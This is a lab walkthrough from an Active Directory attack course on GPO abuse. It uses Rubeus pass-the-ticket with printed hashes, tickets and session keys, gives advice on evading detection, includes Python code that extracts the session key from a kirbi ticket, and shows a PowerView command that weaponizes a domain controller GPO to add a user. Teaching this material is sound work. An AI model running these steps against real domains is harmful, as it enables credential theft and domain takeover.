# Requesting a TGT for the user gpowrite.user

This exercise must be carried out as the user gpowrite.user.

First, run klist to see which logon session we are in and which tickets it currently holds:

```powershell
C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: First-DC.spartancybersec.corp

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/12/2023 20:30:04 (local)
        End Time:   11/13/2023 6:30:04 (local)
        Renew Time: 11/19/2023 20:30:04 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: First-DC.spartancybersec.corp
```

For this exercise it is NECESSARY to have a session as gpowrite.user, for the reason explained in [Using PowerView](/cpad/vulnerabilidades-y-ataques-en-ad/abuso-de-gpo/utilizando-powerview.md#analisis-tecnico-de-la-ace). Rubeus asktgt sends an AS-REQ for the given user with the supplied password, and /ptt (pass-the-ticket) submits the returned TGT into the current logon session. Two details of the output below are worth knowing before running it: the "Using rc4_hmac hash" line is the NT hash of Password@1 (the RC4-HMAC Kerberos key and the NT hash are the same value, so that line alone is reusable with asktgt /rc4:), and Rubeus derives an RC4 key from /password unless told otherwise, which is why the resulting session key is RC4; adding /enctype:aes256 requests an AES session key instead, which stands out less in a domain where AES is the norm.

```
C:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  gpowrite.user (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/12/2023 8:38:53 PM
  EndTime                  :  11/13/2023 6:38:53 AM
  RenewTill                :  11/19/2023 8:38:53 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  ckGFkkPnXw0mmfXrO9bdDQ==
  ASREP (key)              :  64FBAE31CC352FC26AF97CBDEF151E03
```
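The base64 "ticket.kirbi" that Rubeus printed is a KRB-CRED structure, and the fields Rubeus summarises underneath it (ServiceName, UserName, EndTime, KeyType, Base64(key)) are all read from it. The parser below is an added example for this page (it is not code from the page or from Rubeus): a minimal DER walker, in Python, that decodes the blob printed above (copied verbatim) and pulls those fields out again, including the session key. The point it makes is that the KRB-CRED's enc-part has etype 0, so the session key sits in cleartext inside the base64; the blob is a ready-to-use credential until EndTime, and anything that captures the console (C2 logs, screenshots, this page) is holding it. The tag and length handling covers only what Kerberos DER uses (single-byte tags, short and long lengths).

```python
import base64

# The KRB-CRED (.kirbi) exactly as Rubeus printed it above, copied verbatim from the page.
KIRBI_B64 = """
doIGDDCCBgigAwIBBaEDAgEWooIFBDCCBQBhggT8MIIE+KADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKwwggSooAMCARKh
AwIBAqKCBJoEggSWU3ykUEX1iauJdgy6kCv2SA8a9VxZqAJTG3nV0KtcXvT5AX4Z5qxhJkJle4kwe++X
BP/vg7hjlx8txvvRK1/B9P7ACy8StJeO/YNMYkrn1FH8Shiyn3TeeIGD4SuqvsNXSXb1dKyrOi9p7Gt6
7Kf4ifdlUOyTBizCYZf3BkP0Igk/FaelyxZZDSq0kwpSkMqbLrAKvxGHzSVWD6UmsNnJUUmwRnOr3ncN
4bX7+3WxTu7WgAi5nmY2BqFvjN0Exh+kQG2AldwDPJgN4tR9pgfESShgd3p7dn0S9orobVgnVqRpg5rO
18OF6ioi3cNnYa23c9YQy91x603lZt0MkJOSjT6A94d0HbjtDCdPKXD0ZU5/cONIUmmqRaS23FXcgl12
+BeZjtwdLTPJRMfKAGApxLbeBZFdQvsncROhpOtAdgNaQCD91obY4nJV7lzRpx0X4UpVw2hnMuV2LETC
1x+fmZLLN2VBlJPWGXY8m+zfPAYFI4JxllY3xGUAXSCrLy61Rv3EXY4yyMuhhv4GXmvHv5Ru5ShHAOl2
HiJcqc29Ehn9AIcrAE/pMiWVYHMMt4hAudpv2qQYGtOLCvdek9dMqv2uAcUl9/g5ekcD2fyoR2TMK8hL
EiCfKAzOZDHanq8n50czpA211L3eLts+zTjYhafWxTUxKUsiDt2gpaLBslueAEXTy09n7H9wbwxZKcei
HvLV+ZMkiPGewa29JeZFVkrOEE/Gw3PSiq23S8qq4ZvB/5cEesR89eWJkoDJIlVwgUosqzh7P1R+tCYC
/UTrb+X14jtxFbAY5tzZtWYiEM1el2GPXdV2F+W9NlDzXqOLT5UOFrGC8xpr6FwUVEwILvKKX8+5NpUd
HYk8OG4f6hWcyxJpSf431EM4I2BtlqkEpRKTYZwExko33z7VhnMVwXabBOuykIs5NbB+DhwgWla4bx3/
4RYB0Iw7fUSAYbRRda04EzdJ7i+uu9ApIloyToogf792lO6rkEoZLCQm6hpmnh6tLx2Aj7TQPbfoaCX2
x/XC3CWUc91fUlPZXgFsVvG6wDkijEpLbVKNjiGF8nf9UkopG8uT5GbnQbTINVSLVRJkYqdVII8j6KSg
f76GI7HO2emgR/zRInNd/phz5BVE8cgk0h6R9hCh/sjCvaiH7P4Yc7rEb9gQ9AJlT7JVaLga7J3WkJYe
P7xy6lxLdFPXSFRpPnuvn+rTpA/D+7Ided3fnWi/Hw1BxNMFApN/TbXhWjI2xeWRW+wJePMSO8iRkqlr
iCQQBOMIlucJWhhV1dSDPm3PaVviIxiBGBK+JG1kg3YmB8bY+MrCyHulLVfbVXQaomTmMcPRzxpw4fef
ApogZmgpPilvprNjkPSzlYb4iFa6rx0ovYPEm5pi2Q8SlVCszUihr6vnVOC1P1U00rQ067F2R3CZABcz
zq9txDw879r0jlr4nWp6XOuH+qcMF+mEoaXL9cfOjrongvbuzKzVz0Nz0m4xyo7jA9HdZ+5zAFiGMzUn
sJv/vLgWKRLpkZ/MeO4PVCn4aNtGirfpP+ezm6l3tHYJ5EEj44aWwxpOyiU8w6OB8zCB8KADAgEAooHo
BIHlfYHiMIHfoIHcMIHZMIHWoBswGaADAgEXoRIEEHJBhZJD518NJpn16zvW3Q2hFhsUU1BBUlRBTkNZ
QkVSU0VDLkNPUlCiGjAYoAMCAQGhETAPGw1ncG93cml0ZS51c2VyowcDBQBA4QAApREYDzIwMjMxMTEy
MjAzODUzWqYRGA8yMDIzMTExMzA2Mzg1M1qnERgPMjAyMzExMTkyMDM4NTNaqBYbFFNQQVJUQU5DWUJF
UlNFQy5DT1JQqSkwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycA==
"""

def _tlv(buf, pos):
    """Read one DER TLV at buf[pos] -> (tag, value, next_pos). Single-byte tags, short/long lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: 0x8N followed by N big-endian length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _seq(buf):
    """Children (tag, value) of a constructed value's content."""
    out, pos = [], 0
    while pos < len(buf):
        tag, val, pos = _tlv(buf, pos)
        out.append((tag, val))
    return out

def _ctx(children, n):
    """Value wrapped by explicit context tag [n] (0xA0 | n), or None if absent."""
    for tag, val in children:
        if tag == 0xA0 | n:
            return _tlv(val, 0)[1]
    return None

def _principal(content):
    """PrincipalName ::= SEQUENCE { name-type [0], name-string [1] SEQUENCE OF GeneralString }."""
    return "/".join(v.decode() for _, v in _seq(_ctx(_seq(content), 1)))

def parse_kirbi(b64):
    """KRB-CRED -> first Ticket plus the KrbCredInfo that carries the session key."""
    raw = base64.b64decode("".join(b64.split()))
    tag, body, _ = _tlv(raw, 0)
    if tag != 0x76:                        # APPLICATION 22 = KRB-CRED
        raise ValueError("not a KRB-CRED")
    cred = _seq(_tlv(body, 0)[1])
    ticket = _seq(_tlv(_seq(_ctx(cred, 2))[0][1], 0)[1])   # tickets [2] -> Ticket (APPLICATION 1)
    tkt_enc = _seq(_ctx(ticket, 3))        # EncryptedData { etype [0], kvno [1], cipher [2] }
    enc = _seq(_ctx(cred, 3))              # enc-part [3]: etype 0 means EncKrbCredPart is cleartext
    cred_etype = int.from_bytes(_ctx(enc, 0), "big")
    if cred_etype != 0:
        raise ValueError(f"EncKrbCredPart encrypted with etype {cred_etype}; needs the session key")
    part = _seq(_tlv(_tlv(_ctx(enc, 2), 0)[1], 0)[1])  # OCTET STRING -> APPLICATION 29 -> SEQUENCE
    info = _seq(_seq(_ctx(part, 0))[0][1])             # ticket-info [0] -> first KrbCredInfo
    key = _seq(_ctx(info, 0))                          # EncryptionKey { keytype [0], keyvalue [1] }
    flags = _ctx(info, 3)                              # BIT STRING: byte 0 is the unused-bit count
    return {
        "client": _principal(_ctx(info, 2)),
        "client_realm": _ctx(info, 1).decode(),
        "server": _principal(_ctx(info, 9)),
        "flags": int.from_bytes(flags[1:], "big"),
        "start": _ctx(info, 5).decode(),
        "end": _ctx(info, 6).decode(),
        "renew_till": _ctx(info, 7).decode(),
        "session_key_type": int.from_bytes(_ctx(key, 0), "big"),   # 23 = rc4-hmac, 18 = aes256
        "session_key": _ctx(key, 1).hex(),
        "ticket_etype": int.from_bytes(_ctx(tkt_enc, 0), "big"),   # what the krbtgt key encrypts with
        "cred_etype": cred_etype,
    }

def valid_at(cred, kerberos_time):
    """KerberosTime is fixed-width 'YYYYMMDDHHMMSSZ', so string order is chronological."""
    return cred["start"] <= kerberos_time < cred["end"]

if __name__ == "__main__":
    for k, v in parse_kirbi(KIRBI_B64).items():
        print(f"{k:>17}: {v}")
```

Running it reproduces Rubeus' summary: client gpowrite.user, server krbtgt/spartancybersec.corp, flags 0x40e10000, session key type 23 (rc4_hmac) with the same key bytes Rubeus printed as Base64(key), while the ticket's own etype is 18 (AES-256, the krbtgt key). Note that the KrbCredInfo times are in UTC (20231112203853Z), which is what klist renders as 20:38:53 (local) below.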

After the import, klist confirms the new TGT in the same logon session (the LogonId is unchanged). Three details are worth noting. The cache now holds a single ticket: the import replaced the regular.user tickets that were cached in this session. The Session Key Type is RSADSI RC4-HMAC(NT) while the KerbTicket Encryption Type is still AES-256: the TGT itself is encrypted with the krbtgt account's AES key, and only the session key negotiated for the client is RC4, which is the trace an RC4 request leaves behind. And Kdc Called is empty, because LSA never requested this ticket itself; Rubeus handed it in.

```
C:\Users\admin\Desktop>klist

Current LogonId is 0:0x10d6046
Cached Tickets: (1)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 11/12/2023 20:38:53 (local)
        End Time:   11/13/2023 6:38:53 (local)
        Renew Time: 11/19/2023 20:38:53 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
```
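Before running the GPO abuse it is worth checking, rather than eyeballing, that the cache really holds a TGT for the intended principal. The following is an added example (not code from the page or from PowerView) in Python: a small parser for klist output, fed with excerpts of the two outputs on this page (constructed here, trimmed to the relevant entries), plus a check that reports when the cached TGT belongs to someone other than the expected user, when its session key is RC4, or when it was injected rather than requested (empty Kdc Called). The expected-user name and the wording of the findings are this example's own choices.

```python
import re

# Constructed samples, trimmed from the two klist outputs on this page:
# before the Rubeus /ptt import and after it.
KLIST_BEFORE = """\
Current LogonId is 0:0x10d6046
Cached Tickets: (2)

#0>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: First-DC.spartancybersec.corp

#1>     Client: regular.user @ SPARTANCYBERSEC.CORP
        Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Kdc Called: First-DC.spartancybersec.corp
"""
KLIST_AFTER = """\
Current LogonId is 0:0x10d6046
Cached Tickets: (1)

#0>     Client: gpowrite.user @ SPARTANCYBERSEC.CORP
        Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
"""

def parse_klist(text):
    """Return (logon_id, [ticket dicts]) from klist output; each '#N>' block becomes one dict."""
    logon = re.search(r"Current LogonId is (\S+)", text)
    tickets, cur = [], None
    for line in text.splitlines():
        m = re.match(r"\s*#\d+>\s+Client:\s*(.*)", line)
        if m:
            cur = {"Client": m.group(1).strip()}
            tickets.append(cur)
        elif cur is not None and ":" in line:
            k, v = line.split(":", 1)       # 'Kdc Called:' with nothing after it becomes ''
            cur[k.strip()] = v.strip()
    return (logon.group(1) if logon else None), tickets

def check_tgt(text, expected_client):
    """Findings to raise before relying on the cached TGT for a tool that talks to SYSVOL/LDAP."""
    _, tickets = parse_klist(text)
    tgts = [t for t in tickets if t.get("Server", "").lower().startswith("krbtgt/")]
    if not tgts:
        return ["no TGT in the cache"]
    findings = []
    for t in tgts:
        client = t["Client"].split("@")[0].strip()
        if client.lower() != expected_client.lower():
            findings.append(f"TGT is for {client}, not {expected_client}")
        if "RC4" in t.get("Session Key Type", "").upper():
            findings.append(f"RC4 session key on {client}'s TGT: {t['Session Key Type']}")
        if not t.get("Kdc Called"):
            findings.append(f"{client}'s TGT was injected, not requested by LSA (empty Kdc Called)")
    return findings

if __name__ == "__main__":
    for label, text in (("before", KLIST_BEFORE), ("after", KLIST_AFTER)):
        print(label, check_tgt(text, "gpowrite.user"))
```

Against the "before" output the check reports that the TGT belongs to regular.user; against the "after" output the principal is right, but it flags the RC4 session key and the empty Kdc Called, which is exactly the state the page shows at this point.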

If we now run the following steps, we get an error:

```powershell
PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ...  $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
    + FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommand
```
